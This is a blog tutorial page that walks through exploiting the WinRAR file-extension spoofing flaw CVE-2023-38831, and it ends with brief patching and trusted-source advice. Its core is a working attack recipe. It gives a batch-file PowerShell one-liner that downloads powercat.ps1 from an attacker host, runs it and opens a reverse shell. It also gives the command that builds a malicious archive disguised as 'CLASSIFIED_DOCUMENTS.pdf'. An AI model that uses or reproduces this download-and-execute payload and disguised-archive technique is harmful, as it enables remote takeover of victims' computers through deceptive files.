🕹️
Ali Rodoplu
  • 👋Who am I?
  • ARTICLES
  • 🧨Offensive
    • Enum4Linux
    • How to Perform SSH Brute Force Attack and How Can We Protect Our Systems from It?
    • Dictionary Attack via HashCat
    • Credential Dumping via Pypykatz
    • Exploiting the Shellshock Vulnerability and Protecting Yourself against It
    • What is Buffer Overflow Attack and How to Obtain Reverse Shell Using Buffer Overflow Attack
    • How to Kill Microsoft Defender’s Process
    • Getting Reverse Shell with Powercat
    • Creating Backdoor payload and Obtain Reverse Shell via Ngrok and MetaSploit Framework
    • Kiterunner
  • ⚙️Defensive
    • 📺Static Analysis
      • Finding Malwares by Performing Static Analysis with PeStudio
    • 📌Dynamic Analysis
      • Find Malwares using Process Explorer
      • Find Malwares Using Sysmon
      • Malware Hunting using Procmon and Procexp
      • Linux Sysmon
    • 📀Reverse Engineering
      • ILSPY ile Zararlı bir .NET PE'sine Reverse Engineering.
  • 🔥CVE Explotation
    • CVE-2023-48795 Zafiyeti ve Bazı Mitigation Adımlarının Gerçekleştirilmesi
    • Heap Buffer Overflow in libwebp in Google Chrome - CVE-2023-4863
    • HTTP/2 ‘Rapid Reset’ DDoS atağı CVE-2023-44487
    • Exploit the Log4J Vulnerability - CVE-2021-44228
    • Exploit the WinRAR - CVE-2023-38831
  • 🔗OSINT
    • Maltego the OSINT Tool
  • 🎯Attack Simulation
    • Caldera Installation and Simulating an Attack with Caldera
    • How to Install Atomic Red Team, Which is an Attack Simulation Tool?
  • 💻Cyber Security
    • Dolandırıcıların Yeni Dolandırıcılık Yöntemlerinden biri: Youtube Reklamları
    • OWASP And OWASP Top Ten Project
    • Understanding the MITRE ATT&CK Framework and the Relationship Between MITRE and Security Products
    • Machine Learning and CyberSecurity
  • 💿Cyber Security Products
    • Trellix(FireEye)
      • Creating HX Policy And Host Set then Binding Them To Each Other
      • What is Helix and some example about Index Search Inside Data Lake
      • Installation of FireEye HX(currently Trellix HX)
    • CrowdStrike
      • CrowdStrike’s FileVantage Feature and How to Set Policy.
      • CrowdStrike Prevention Policy’s Features and Assigning Policy to the Host Group
  • 💾General
    • What is PrivateGPT and How to Install It
Powered by GitBook
On this page
  1. CVE Explotation

Exploit the WinRAR - CVE-2023-38831

PreviousExploit the Log4J Vulnerability - CVE-2021-44228NextOSINT

Last updated 1 year ago

Use what I'm about to say in this article only for the right purposes, such as raising security awareness and improving the security posture of your environments. I do not accept any responsibility for other uses.

CVE-2023-38831 is a file extension spoofing vulnerability in RARLabs WinRAR. By exploiting this vulnerability, attackers can create a RAR or ZIP archive containing a harmless file and embed malicious code in a folder with the same name. If the user opens the archive to view the harmless file, the malicious code is executed.

This vulnerability was used to distribute malware in the wild from April to August 2023. The target audience of the attacks were typically individuals with access to information about financial markets. Attackers tricked victims into opening malicious archives by sending them via email or sharing them on websites or social media platforms.

Let's Exploit WinRAR

Requirements

  • WinRAR version 6.22 or earlier.

  • Victim Machine

  • Attacker Machine

  • Powercat(optionally)

Let's download our exploit tool via Git or the interface.

First, check the WinRAR Version if it is vulnerable version or not.

Let's open the "script.bat" file with a text editor among the files we downloaded. 

powershell -c "IEX (New-Object System.Net.WebClient).DownloadString('http://<Attacker-IP>/powercat.ps1');powercat -c <Attacker-IP> -p 4444 -e cmd"

Then start a NetCat listener in attacker host and run the "cve-2023-38831-exp-gen.py" file in the tool we downloaded with the relevant parameters as follows.

python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat  poc.rar

After we run it, we see that a file called poc.rar has been created. This file is a PDF containing our malicious code. Let's run the PDF and see what happens.

When we check our attacker host, we see that we've obtained reverse shell.

How can we defend ourselves against this vulnerability?

  • Use the latest version of WinRAR. WinRAR has released a security patch that addresses CVE-2023-38831. To install the patch, open WinRAR and select "Updates" from the "File" menu.

  • Only open files from trusted sources. To reduce your risk of being exposed to an attack that uses CVE-2023-38831, only open files from sources you trust.

  • Check the contents of files before opening them. To further reduce your risk of being exposed to an attack that uses CVE-2023-38831, check the contents of the file before opening it. This will help you ensure that the file does not contain a virus or malware.

Winrar Exploit Tool()

This bat file is the file containing the malicious code that the vulnerable .rar file will run. Let's put our command for revershell inside.

🔥
https://github.com/b1tg/CVE-2023-38831-winrar-exploit
powercat
Image Source:
https://www.helpnetsecurity.com/2023/08/23/cve-2023-38831-exploited/